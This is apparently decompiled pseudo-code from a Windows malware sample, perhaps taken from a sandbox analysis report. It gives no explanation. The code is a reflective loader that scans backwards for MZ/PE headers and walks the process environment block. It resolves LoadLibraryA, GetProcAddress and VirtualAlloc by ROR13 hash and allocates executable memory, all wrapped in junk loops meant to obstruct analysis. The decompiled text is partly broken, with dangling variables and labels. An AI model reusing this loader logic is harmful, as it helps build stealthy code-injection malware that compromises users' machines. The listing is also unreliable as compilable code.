                                                                                                                                                                                                                    				if(_t672 <= _t707) {
                                                                                                                                                                                                                    					_v192 = _v232;
                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                    						asm("movsd xmm0, [esp+0xa8]");
                                                                                                                                                                                                                    						_t583 = E6F202720(_t372, _t672);
                                                                                                                                                                                                                    						asm("movsd [esp+0x48], xmm0");
                                                                                                                                                                                                                    						asm("movsd xmm0, [esp+0x60]");
                                                                                                                                                                                                                    						E6F202720(_t583, _t672);
                                                                                                                                                                                                                    						asm("addsd xmm0, [esp+0x48]");
                                                                                                                                                                                                                    						_t588 = _v196;
                                                                                                                                                                                                                    						_t372 = 0x5a4d;
                                                                                                                                                                                                                    						asm("mulsd xmm0, [esp+0x80]");
                                                                                                                                                                                                                    						asm("divsd xmm0, [esp+0x68]");
                                                                                                                                                                                                                    						asm("movsd [esp+0x48], xmm0");
                                                                                                                                                                                                                    						if( *_t588 != 0x5a4d) {
                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t672 =  *(_t588 + 0x3c);
                                                                                                                                                                                                                    						_t372 = _t672 - 0x40;
                                                                                                                                                                                                                    						if(_t672 - 0x40 > 0x3bf) {
                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t672 = _t672 + _t588;
                                                                                                                                                                                                                    						_v192 = _t672;
                                                                                                                                                                                                                    						if( *_t672 != 0x4550) {
                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t672 = _v240;
                                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                    						_v196 = _t588 - 1;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				L11:
                                                                                                                                                                                                                    				_t374 =  *[fs:0x30];
                                                                                                                                                                                                                    				_v224 = _t374;
                                                                                                                                                                                                                    				_v200 = 0;
                                                                                                                                                                                                                    				__eflags = _t672 - _t707;
                                                                                                                                                                                                                    				if(_t672 > _t707) {
                                                                                                                                                                                                                    					_t497 =  *(_t374 + 0xc);
                                                                                                                                                                                                                    					_v224 = _t497;
                                                                                                                                                                                                                    					_t374 =  *(_t497 + 0x14);
                                                                                                                                                                                                                    					_v228 = _t374;
                                                                                                                                                                                                                    					__eflags = _t374;
                                                                                                                                                                                                                    					if(_t374 != 0) {
                                                                                                                                                                                                                    						asm("movsd xmm0, [0x6f245520]");
                                                                                                                                                                                                                    						asm("movsd [esp+0x78], xmm0");
                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                    							asm("movss xmm1, [0x6f245598]");
                                                                                                                                                                                                                    							__eflags = _t672 - _t707;
                                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                                    								__eflags = _t736 - 5;
                                                                                                                                                                                                                    								if(_t736 != 5) {
                                                                                                                                                                                                                    									E6F205BC0(0x2418, _t672);
                                                                                                                                                                                                                    									asm("cvttss2si eax, xmm0");
                                                                                                                                                                                                                    									asm("movd xmm0, eax");
                                                                                                                                                                                                                    									asm("cvtdq2ps xmm0, xmm0");
                                                                                                                                                                                                                    									asm("mulss xmm0, [0x6f2454bc]");
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									asm("movaps xmm0, xmm1");
                                                                                                                                                                                                                    									L6F237030(E6F205B70(_t588), _t502);
                                                                                                                                                                                                                    									asm("cvtsd2ss xmm0, xmm0");
                                                                                                                                                                                                                    									asm("divss xmm0, [0x6f2455f8]");
                                                                                                                                                                                                                    									asm("mulss xmm0, [0x6f245610]");
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								asm("cvttss2si esi, xmm0");
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								_t504 =  *(_t374 + 0x24) & 0x0000ffff;
                                                                                                                                                                                                                    								_v176 =  *((intOrPtr*)(_t374 + 0x28));
                                                                                                                                                                                                                    								_v208 = _t504;
                                                                                                                                                                                                                    								_t672 = (_t504 + 1) * 4 >> 0x20;
                                                                                                                                                                                                                    								_v200 = 0;
                                                                                                                                                                                                                    								E6F2140F4( ~(0 | __eflags > 0x00000000) | (_t504 + 0x00000001) * 0x00000004, (_t504 + 1) * 4 >> 0x20, __eflags,  ~(0 | __eflags > 0x00000000) | (_t504 + 0x00000001) * 0x00000004);
                                                                                                                                                                                                                    								_t756 = _t756 + 4;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							_t588 = _v208;
                                                                                                                                                                                                                    							_v172 = _t588 & 0x0000ffff;
                                                                                                                                                                                                                    							__eflags = _t588;
                                                                                                                                                                                                                    							if(_t588 == 0) {
                                                                                                                                                                                                                    								goto L25;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								goto L21;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							do {
                                                                                                                                                                                                                    								L21:
                                                                                                                                                                                                                    								_t577 = E6F207820(_v200, _t672);
                                                                                                                                                                                                                    								_t588 =  *_v176;
                                                                                                                                                                                                                    								_t702 = (_t588 & 0x000000ff) + _t577;
                                                                                                                                                                                                                    								_v200 = _t702;
                                                                                                                                                                                                                    								__eflags = _t588 - 0x61;
                                                                                                                                                                                                                    								if(_t588 >= 0x61) {
                                                                                                                                                                                                                    									_t702 = _t702 + 0xffffffe0;
                                                                                                                                                                                                                    									__eflags = _t702;
                                                                                                                                                                                                                    									_v200 = _t702;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								asm("cdq");
                                                                                                                                                                                                                    								__eflags = _v240 - _t702 >> 1 - _t707;
                                                                                                                                                                                                                    								_t672 =  <  ? _t707 : _v240;
                                                                                                                                                                                                                    								_v176 = _v176 + 1;
                                                                                                                                                                                                                    								_t582 = _v172 + 0xffff;
                                                                                                                                                                                                                    								_v240 = _t672;
                                                                                                                                                                                                                    								_v172 = _t582;
                                                                                                                                                                                                                    								__eflags = _t582;
                                                                                                                                                                                                                    							} while (_t582 != 0);
                                                                                                                                                                                                                    							L26:
                                                                                                                                                                                                                    							__eflags = _v200 - 0x6a4abc5b;
                                                                                                                                                                                                                    							if(_v200 == 0x6a4abc5b) {
                                                                                                                                                                                                                    								__eflags = _t672 - _t707;
                                                                                                                                                                                                                    								if(_t672 <= _t707) {
                                                                                                                                                                                                                    									asm("o16 nop [eax+eax]");
                                                                                                                                                                                                                    									L84:
                                                                                                                                                                                                                    									GetCurrentThread();
                                                                                                                                                                                                                    									goto L84;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								_v208 = 3;
                                                                                                                                                                                                                    								_t640 =  *(_v228 + 0x10);
                                                                                                                                                                                                                    								_v224 = _t640;
                                                                                                                                                                                                                    								_t519 =  *((intOrPtr*)( *((intOrPtr*)(_t640 + 0x3c)) + _t640 + 0x78)) + _t640;
                                                                                                                                                                                                                    								_v108 = _t519;
                                                                                                                                                                                                                    								_v124 =  *((intOrPtr*)(_t519 + 0x20)) + _t640;
                                                                                                                                                                                                                    								_t524 =  *((intOrPtr*)(_v108 + 0x24)) + _t640;
                                                                                                                                                                                                                    								__eflags = _t524;
                                                                                                                                                                                                                    								_v172 = _t524;
                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                    									__eflags = _t672 + _t672 - _t707;
                                                                                                                                                                                                                    									if(_t672 + _t672 < _t707) {
                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									_t643 =  *_v124 + _v224;
                                                                                                                                                                                                                    									_t729 = 0;
                                                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                                                    									_t530 =  *_t643;
                                                                                                                                                                                                                    									do {
                                                                                                                                                                                                                    										asm("ror edi, 0xd");
                                                                                                                                                                                                                    										_t643 = _t643 + 1;
                                                                                                                                                                                                                    										_t729 = _t729 + _t530;
                                                                                                                                                                                                                    										_t530 =  *_t643;
                                                                                                                                                                                                                    										__eflags = _t530;
                                                                                                                                                                                                                    									} while (_t530 != 0);
                                                                                                                                                                                                                    									__eflags = _t729 - 0xec0e4e8e;
                                                                                                                                                                                                                    									if(_t729 == 0xec0e4e8e) {
                                                                                                                                                                                                                    										L35:
                                                                                                                                                                                                                    										asm("cdq");
                                                                                                                                                                                                                    										_t699 = _v216;
                                                                                                                                                                                                                    										__eflags = _t672 - _t672 >> 1 - _t699;
                                                                                                                                                                                                                    										_t645 =  <  ? _t699 : _v240;
                                                                                                                                                                                                                    										_v240 =  <  ? _t699 : _v240;
                                                                                                                                                                                                                    										_t588 =  *((intOrPtr*)(_v108 + 0x1c)) + ( *_v172 & 0x0000ffff) * 4 + _v224;
                                                                                                                                                                                                                    										_v212 = _t588;
                                                                                                                                                                                                                    										__eflags = _t729 - 0xec0e4e8e;
                                                                                                                                                                                                                    										if(_t729 != 0xec0e4e8e) {
                                                                                                                                                                                                                    											__eflags = _t729 - 0x7c0dfcaa;
                                                                                                                                                                                                                    											if(_t729 != 0x7c0dfcaa) {
                                                                                                                                                                                                                    												__eflags = _t729 - 0x91afca54;
                                                                                                                                                                                                                    												if(_t729 != 0x91afca54) {
                                                                                                                                                                                                                    													goto L55;
                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                    													_t672 = _v240;
                                                                                                                                                                                                                    													_t731 = _v216;
                                                                                                                                                                                                                    													_v116 = _t672;
                                                                                                                                                                                                                    													__eflags = _t672 - _t731;
                                                                                                                                                                                                                    													if(_t672 > _t731) {
                                                                                                                                                                                                                    														asm("cdq");
                                                                                                                                                                                                                    														_t545 = _t672 - _t672;
                                                                                                                                                                                                                    														__eflags = _t545;
                                                                                                                                                                                                                    														_t546 = _t545 >> 1;
                                                                                                                                                                                                                    														_v232 = _t546;
                                                                                                                                                                                                                    														while(1) {
                                                                                                                                                                                                                    															__eflags = _t546 - _t731;
                                                                                                                                                                                                                    															if(_t546 >= _t731) {
                                                                                                                                                                                                                    																break;
                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                    															_v100 = 7;
                                                                                                                                                                                                                    															_v148 = 0;
                                                                                                                                                                                                                    															__eflags = _t736 - 0x29;
                                                                                                                                                                                                                    															if(_t736 > 0x29) {
                                                                                                                                                                                                                    																_t732 = 0x36;
                                                                                                                                                                                                                    																asm("o16 nop [eax+eax]");
                                                                                                                                                                                                                    																do {
                                                                                                                                                                                                                    																	E6F205BC0(_t732, _t672);
                                                                                                                                                                                                                    																	_t732 = L6F236E30(_t672, _t732);
                                                                                                                                                                                                                    																	E6F205BC0(_t732, _t672);
                                                                                                                                                                                                                    																	_t736 = L6F236E30(_t672, _t732);
                                                                                                                                                                                                                    																	_t546 = E6F236550(_v100, _v148, _t736, _t672);
                                                                                                                                                                                                                    																	_v116 = _t546;
                                                                                                                                                                                                                    																	_v164 = _t672;
                                                                                                                                                                                                                    																	__eflags = _t546 - _t736 + _t732 - 0x29;
                                                                                                                                                                                                                    																} while (_t546 - _t736 + _t732 > 0x29);
                                                                                                                                                                                                                    																_t731 = _a99626;
                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                    															asm("movss xmm1, [0x6f2455d0]");
                                                                                                                                                                                                                    															asm("xorps xmm0, xmm0");
                                                                                                                                                                                                                    															asm("divss xmm1, xmm0");
                                                                                                                                                                                                                    															asm("subss xmm0, xmm1");
                                                                                                                                                                                                                    															asm("cvttss2si esi, xmm0");
                                                                                                                                                                                                                    															__eflags = _t736 - 0x1d;
                                                                                                                                                                                                                    															if(_t736 < 0x1d) {
                                                                                                                                                                                                                    																_t546 = E6F205BC0(0x17, _t672);
                                                                                                                                                                                                                    																asm("cvttss2si eax, xmm0");
                                                                                                                                                                                                                    																_t736 = _t546;
                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                    															__eflags = _t736 - 0x43;
                                                                                                                                                                                                                    															if(_t736 <= 0x43) {
                                                                                                                                                                                                                    																_t550 = E6F205DC0(_t546, 0x7a);
                                                                                                                                                                                                                    																asm("movsd xmm1, [esp+0x78]");
                                                                                                                                                                                                                    																_t736 = _t550;
                                                                                                                                                                                                                    																asm("movd xmm0, esi");
                                                                                                                                                                                                                    																asm("cvtdq2pd xmm0, xmm0");
                                                                                                                                                                                                                    																asm("subsd xmm1, xmm0");
                                                                                                                                                                                                                    																asm("cvttsd2si eax, xmm1");
                                                                                                                                                                                                                    																_v148 = _t550;
                                                                                                                                                                                                                    																E6F205BC0(0x73, _t672);
                                                                                                                                                                                                                    																asm("xorps xmm1, xmm1");
                                                                                                                                                                                                                    																asm("cvtss2sd xmm1, xmm0");
                                                                                                                                                                                                                    																asm("movd xmm0, eax");
                                                                                                                                                                                                                    																asm("cvtdq2pd xmm0, xmm0");
                                                                                                                                                                                                                    																asm("subsd xmm0, xmm1");
                                                                                                                                                                                                                    																asm("cvttsd2si esi, xmm0");
                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                    															_t546 = _v232;
                                                                                                                                                                                                                    															_t588 = _v116 + 1;
                                                                                                                                                                                                                    															_v116 = _t588;
                                                                                                                                                                                                                    															__eflags = _t588 - _t731;
                                                                                                                                                                                                                    															if(_t588 > _t731) {
                                                                                                                                                                                                                    																continue;
                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                    															goto L55;
                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                    														_t549 =  *_v212 + _v224;
                                                                                                                                                                                                                    														__eflags = _t549;
                                                                                                                                                                                                                    														_v236 = _t549;
                                                                                                                                                                                                                    														goto L55;
                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                    												_t659 = _v240;
                                                                                                                                                                                                                    												__eflags = _t659 + 4 - _t699;
                                                                                                                                                                                                                    												_t588 =  <=  ? _t699 : _t659;
                                                                                                                                                                                                                    												_v240 =  <=  ? _t699 : _t659;
                                                                                                                                                                                                                    												_v12 =  *_v212 + _v224;
                                                                                                                                                                                                                    												goto L55;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											_t563 = _v240;
                                                                                                                                                                                                                    											__eflags = _v240 + _t563 - _t699;
                                                                                                                                                                                                                    											if(_v240 + _t563 < _t699) {
                                                                                                                                                                                                                    												asm("movsd xmm0, [0x6f245528]");
                                                                                                                                                                                                                    												asm("movsd [esp+0x78], xmm0");
                                                                                                                                                                                                                    												while(1) {
                                                                                                                                                                                                                    													asm("movsd [esp+0x60], xmm0");
                                                                                                                                                                                                                    													_v172 = 0x6a;
                                                                                                                                                                                                                    													__eflags = _t736 - 0x5c;
                                                                                                                                                                                                                    													if(_t736 < 0x5c) {
                                                                                                                                                                                                                    														goto L73;
                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                    														goto L72;
                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                    													do {
                                                                                                                                                                                                                    														L72:
                                                                                                                                                                                                                    														GetFocus();
                                                                                                                                                                                                                    														_v172 = _v172 * _v172;
                                                                                                                                                                                                                    														asm("cvttsd2si ecx, [esp+0x60]");
                                                                                                                                                                                                                    														E6F205BC0(_v172 * _v172, _t699);
                                                                                                                                                                                                                    														asm("movsd xmm2, [esp+0x60]");
                                                                                                                                                                                                                    														asm("cvttss2si eax, xmm0");
                                                                                                                                                                                                                    														asm("movd xmm1, eax");
                                                                                                                                                                                                                    														asm("cvtdq2pd xmm1, xmm1");
                                                                                                                                                                                                                    														asm("movd xmm0, eax");
                                                                                                                                                                                                                    														asm("subsd xmm2, xmm1");
                                                                                                                                                                                                                    														asm("cvtdq2pd xmm0, xmm0");
                                                                                                                                                                                                                    														asm("mulsd xmm1, xmm2");
                                                                                                                                                                                                                    														asm("movsd [esp+0x60], xmm2");
                                                                                                                                                                                                                    														asm("subsd xmm0, xmm1");
                                                                                                                                                                                                                    														asm("cvttsd2si eax, xmm0");
                                                                                                                                                                                                                    														__eflags = _v172 - 0x5c;
                                                                                                                                                                                                                    													} while (_v172 >= 0x5c);
                                                                                                                                                                                                                    													L73:
                                                                                                                                                                                                                    													_t752 = 0x15;
                                                                                                                                                                                                                    													do {
                                                                                                                                                                                                                    														GetUserDefaultLangID();
                                                                                                                                                                                                                    														_t567 = E6F205BC0(_t752, _t699);
                                                                                                                                                                                                                    														asm("cvttss2si eax, xmm0");
                                                                                                                                                                                                                    														_t752 = _t567;
                                                                                                                                                                                                                    														__eflags = _t752 - 0x7e;
                                                                                                                                                                                                                    													} while (_t752 <= 0x7e);
                                                                                                                                                                                                                    													_t568 = 0xa;
                                                                                                                                                                                                                    													do {
                                                                                                                                                                                                                    														_t569 = E6F205BC0(_t568, _t699);
                                                                                                                                                                                                                    														asm("cvttss2si eax, xmm0");
                                                                                                                                                                                                                    														_t568 = _t569;
                                                                                                                                                                                                                    														__eflags = _t568 - 0x7d;
                                                                                                                                                                                                                    													} while (_t568 != 0x7d);
                                                                                                                                                                                                                    													__imp__FlushProcessWriteBuffers();
                                                                                                                                                                                                                    													asm("movsd xmm0, [esp+0x78]");
                                                                                                                                                                                                                    													_t736 = 0x1e4;
                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    											_v120 =  *_t588 + _v224;
                                                                                                                                                                                                                    											L55:
                                                                                                                                                                                                                    											_t672 = _v240;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    										_t123 =  &_v208;
                                                                                                                                                                                                                    										 *_t123 = _v208 + 0xffff;
                                                                                                                                                                                                                    										__eflags =  *_t123;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										__eflags = _t729 - 0x7c0dfcaa;
                                                                                                                                                                                                                    										if(_t729 == 0x7c0dfcaa) {
                                                                                                                                                                                                                    											goto L35;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											__eflags = _t729 - 0x91afca54;
                                                                                                                                                                                                                    											if(_t729 == 0x91afca54) {
                                                                                                                                                                                                                    												goto L35;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									_t707 = _v216;
                                                                                                                                                                                                                    									__eflags = _t672 + 4 - _t707;
                                                                                                                                                                                                                    									if(_t672 + 4 <= _t707) {
                                                                                                                                                                                                                    										_t588 = 0;
                                                                                                                                                                                                                    										_v232 = 0x69;
                                                                                                                                                                                                                    										_t539 = 0x27;
                                                                                                                                                                                                                    										__eflags = _t736 - 0x46;
                                                                                                                                                                                                                    										if(_t736 != 0x46) {
                                                                                                                                                                                                                    											_t753 = _v232;
                                                                                                                                                                                                                    											_t730 = 0;
                                                                                                                                                                                                                    											do {
                                                                                                                                                                                                                    												_t753 = E6F236550(_t539, _t588, _t753, _t730);
                                                                                                                                                                                                                    												_t730 = _t672;
                                                                                                                                                                                                                    												_t541 = E6F205DF0(_t585, _t540, _t672, __eflags);
                                                                                                                                                                                                                    												asm("cdq");
                                                                                                                                                                                                                    												_v248 = _t541;
                                                                                                                                                                                                                    												_v228 = _t672;
                                                                                                                                                                                                                    												_t543 = E6F2369A0(_t540, _t672, _t541, _t672);
                                                                                                                                                                                                                    												_t588 = _v244;
                                                                                                                                                                                                                    												__eflags = _t543 - 0x46;
                                                                                                                                                                                                                    												_t539 = _v264;
                                                                                                                                                                                                                    											} while (_t543 != 0x46);
                                                                                                                                                                                                                    											_t707 = _v216;
                                                                                                                                                                                                                    											_t672 = _v240;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    										_t736 = 0;
                                                                                                                                                                                                                    										__eflags = 0;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										_v124 = _v124 + 4;
                                                                                                                                                                                                                    										_v172 = _v172 + 2;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									__eflags = _v208;
                                                                                                                                                                                                                    									if(_v208 > 0) {
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									goto L65;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								_t728 = __imp__GetClipboardSequenceNumber;
                                                                                                                                                                                                                    								_t750 = 0x7b;
                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                    									_t526 =  *_t728();
                                                                                                                                                                                                                    									asm("movsd xmm1, [esp+0x68]");
                                                                                                                                                                                                                    									asm("subsd xmm1, xmm1");
                                                                                                                                                                                                                    									asm("movaps xmm0, xmm1");
                                                                                                                                                                                                                    									asm("movsd [esp+0x68], xmm1");
                                                                                                                                                                                                                    									asm("mulsd xmm0, [esp+0x60]");
                                                                                                                                                                                                                    									asm("cvttsd2si eax, xmm0");
                                                                                                                                                                                                                    									__eflags = _t526 - 0x71;
                                                                                                                                                                                                                    								} while (__eflags > 0);
                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                    									_t527 = E6F205DF0(_t585, _t750, _t672, __eflags);
                                                                                                                                                                                                                    									_t750 = _t527;
                                                                                                                                                                                                                    									__eflags = _t527 - 8;
                                                                                                                                                                                                                    								} while (__eflags != 0);
                                                                                                                                                                                                                    								_t751 = __imp__GetLargePageMinimum;
                                                                                                                                                                                                                    								L82:
                                                                                                                                                                                                                    								 *_t751();
                                                                                                                                                                                                                    								goto L82;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							L65:
                                                                                                                                                                                                                    							__eflags = _v120;
                                                                                                                                                                                                                    							if(_v120 == 0) {
                                                                                                                                                                                                                    								L68:
                                                                                                                                                                                                                    								_t374 =  *_v228;
                                                                                                                                                                                                                    								_v228 = _t374;
                                                                                                                                                                                                                    								__eflags = _t374;
                                                                                                                                                                                                                    								if(_t374 != 0) {
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								__eflags = _v12;
                                                                                                                                                                                                                    								if(_v12 == 0) {
                                                                                                                                                                                                                    									goto L68;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									__eflags = _v236;
                                                                                                                                                                                                                    									if(_v236 != 0) {
                                                                                                                                                                                                                    										asm("cdq");
                                                                                                                                                                                                                    										__eflags = _t672 - _t672 >> 1 - _t707;
                                                                                                                                                                                                                    										if(_t672 - _t672 >> 1 < _t707) {
                                                                                                                                                                                                                    											_t374 = 0;
                                                                                                                                                                                                                    											__eflags = _t736 - 0x27;
                                                                                                                                                                                                                    											if(_t736 != 0x27) {
                                                                                                                                                                                                                    												asm("movss xmm1, [0x6f245600]");
                                                                                                                                                                                                                    												_t727 = 0x2c;
                                                                                                                                                                                                                    												do {
                                                                                                                                                                                                                    													asm("cvtps2pd xmm0, xmm1");
                                                                                                                                                                                                                    													_t511 = (_t374 << 0x00000020 | _t727) << 1;
                                                                                                                                                                                                                    													asm("movsd [esp+0x68], xmm0");
                                                                                                                                                                                                                    													_t727 = _t727 + _t727;
                                                                                                                                                                                                                    													_v236 = _t511;
                                                                                                                                                                                                                    													_t512 = L6F237030(_t511, _t727);
                                                                                                                                                                                                                    													asm("addsd xmm0, [esp+0x68]");
                                                                                                                                                                                                                    													_t672 = _v236;
                                                                                                                                                                                                                    													asm("cvtsd2ss xmm0, xmm0");
                                                                                                                                                                                                                    													asm("movss [esp+0x1c], xmm0");
                                                                                                                                                                                                                    													L6F237030(_t512, _t727);
                                                                                                                                                                                                                    													asm("xorps xmm1, xmm1");
                                                                                                                                                                                                                    													_t374 = _v236;
                                                                                                                                                                                                                    													asm("cvtsd2ss xmm1, xmm0");
                                                                                                                                                                                                                    													asm("mulss xmm1, [esp+0x1c]");
                                                                                                                                                                                                                    													asm("cvtps2pd xmm0, xmm1");
                                                                                                                                                                                                                    													asm("addsd xmm0, [esp+0x68]");
                                                                                                                                                                                                                    													asm("cvttsd2si esi, xmm0");
                                                                                                                                                                                                                    													__eflags = _t736 - 0x27;
                                                                                                                                                                                                                    												} while (_t736 != 0x27);
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											_t672 = 0x91afca54;
                                                                                                                                                                                                                    											E6F2079C0(0x91afca54);
                                                                                                                                                                                                                    											_t374 = VirtualAlloc(0,  *((intOrPtr*)(_v192 + 0x50)) + 0xc, 0x3000, 0x40); // executed
                                                                                                                                                                                                                    											_v224 = _t374;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										goto L68;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							goto L90;
                                                                                                                                                                                                                    							L25:
                                                                                                                                                                                                                    							_t672 = _v240;
                                                                                                                                                                                                                    							goto L26;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				L90:
                                                                                                                                                                                                                    				asm("movsd xmm1, [0x6f2454a8]");
                                                                                                                                                                                                                    				_t708 = 1;
                                                                                                                                                                                                                    				asm("movsd xmm0, [0x6f2454c8]");
                                                                                                                                                                                                                    				asm("movsd xmm2, [0x6f2454c0]");
                                                                                                                                                                                                                    				asm("movsd [esp+0x68], xmm1");
                                                                                                                                                                                                                    				asm("movsd xmm1, [0x6f245568]");
                                                                                                                                                                                                                    				_v232 = _t736;
                                                                                                                                                                                                                    				asm("movsd [esp+0x70], xmm0");
                                                                                                                                                                                                                    				asm("movsd [esp+0x90], xmm2");
                                                                                                                                                                                                                    				asm("movsd [esp+0x58], xmm1");
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					asm("subsd xmm0, xmm2");
                                                                                                                                                                                                                    					asm("mulsd xmm0, [esp+0x80]");
                                                                                                                                                                                                                    					asm("addsd xmm0, [esp+0x60]");
                                                                                                                                                                                                                    					_t374 = E6F202720(_t374, _t672);
                                                                                                                                                                                                                    					asm("mulsd xmm0, [esp+0x68]");
                                                                                                                                                                                                                    					_t708 = _t708 + 1;
                                                                                                                                                                                                                    					__eflags = _t708;
                                                                                                                                                                                                                    					asm("movsd xmm1, [esp+0x58]");
                                                                                                                                                                                                                    					asm("movsd xmm2, [esp+0x90]");
                                                                                                                                                                                                                    					asm("addsd xmm0, [esp+0x48]");
                                                                                                                                                                                                                    					asm("movsd [esp+0x48], xmm0");
                                                                                                                                                                                                                    					asm("movd xmm0, edi");
                                                                                                                                                                                                                    					asm("cvtdq2pd xmm0, xmm0");
                                                                                                                                                                                                                    					asm("comisd xmm1, xmm0");
                                                                                                                                                                                                                    				} while (_t708 >= 0);
                                                                                                                                                                                                                    				_t709 = _v216;
                                                                                                                                                                                                                    				_t589 = _v240;
                                                                                                                                                                                                                    				__eflags = _t589 - _t709;
                                                                                                                                                                                                                    				if(_t589 <= _t709) {
                                                                                                                                                                                                                    					__eflags = _t736 - 0x60;
                                                                                                                                                                                                                    					if(_t736 <= 0x60) {
                                                                                                                                                                                                                    						_t375 = _v232;
                                                                                                                                                                                                                    						_t736 = _t375;
                                                                                                                                                                                                                    						__eflags = _t375;
                                                                                                                                                                                                                    						if(_t375 >= 0) {
                                                                                                                                                                                                                    							__eflags = _t736 - 0x41;
                                                                                                                                                                                                                    							if(_t736 > 0x41) {
                                                                                                                                                                                                                    								goto L99;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							goto L102;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							_t736 = 1;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                    						__imp__GetLargePageMinimum();
                                                                                                                                                                                                                    						L99:
                                                                                                                                                                                                                    						asm("movss xmm0, [0x6f2455c8]");
                                                                                                                                                                                                                    						asm("movss [esp+0x18], xmm0");
                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                    							GetClipboardViewer();
                                                                                                                                                                                                                    							asm("movss xmm0, [esp+0x18]");
                                                                                                                                                                                                                    							_t589 = E6F205B70(_t589);
                                                                                                                                                                                                                    							L6F237030(_t493, _t493);
                                                                                                                                                                                                                    							asm("cvtsd2ss xmm0, xmm0");
                                                                                                                                                                                                                    							asm("cvttss2si esi, xmm0");
                                                                                                                                                                                                                    							asm("movss [esp+0x18], xmm0");
                                                                                                                                                                                                                    							__eflags = _t736 - 0x41;
                                                                                                                                                                                                                    						} while (_t736 > 0x41);
                                                                                                                                                                                                                    						_t589 = _a24849;
                                                                                                                                                                                                                    						L102:
                                                                                                                                                                                                                    						asm("movsd xmm1, [0x6f245508]");
                                                                                                                                                                                                                    						__eflags = _t736 - 2;
                                                                                                                                                                                                                    						while(_t736 == 2) {
                                                                                                                                                                                                                    							asm("movaps xmm0, xmm1");
                                                                                                                                                                                                                    							asm("divsd xmm0, xmm1");
                                                                                                                                                                                                                    							asm("cvttsd2si eax, xmm0");
                                                                                                                                                                                                                    							asm("movd xmm0, eax");
                                                                                                                                                                                                                    							asm("cvtdq2pd xmm0, xmm0");
                                                                                                                                                                                                                    							asm("subsd xmm1, xmm0");
                                                                                                                                                                                                                    							asm("mulsd xmm0, xmm1");
                                                                                                                                                                                                                    							asm("cvttsd2si esi, xmm0");
                                                                                                                                                                                                                    							__eflags = _t736 - 2;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t376 = _v228;
                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                    					_t697 = _v196;
                                                                                                                                                                                                                    					_v176 = _t697;
                                                                                                                                                                                                                    					_t496 =  *((intOrPtr*)(_t697 + 0x3c)) + _t697;
                                                                                                                                                                                                                    					_t672 = _v224;
                                                                                                                                                                                                                    					_v192 = _t496;
                                                                                                                                                                                                                    					_v204 = _t672;
                                                                                                                                                                                                                    					_t376 =  *(_t496 + 0x54);
                                                                                                                                                                                                                    				}
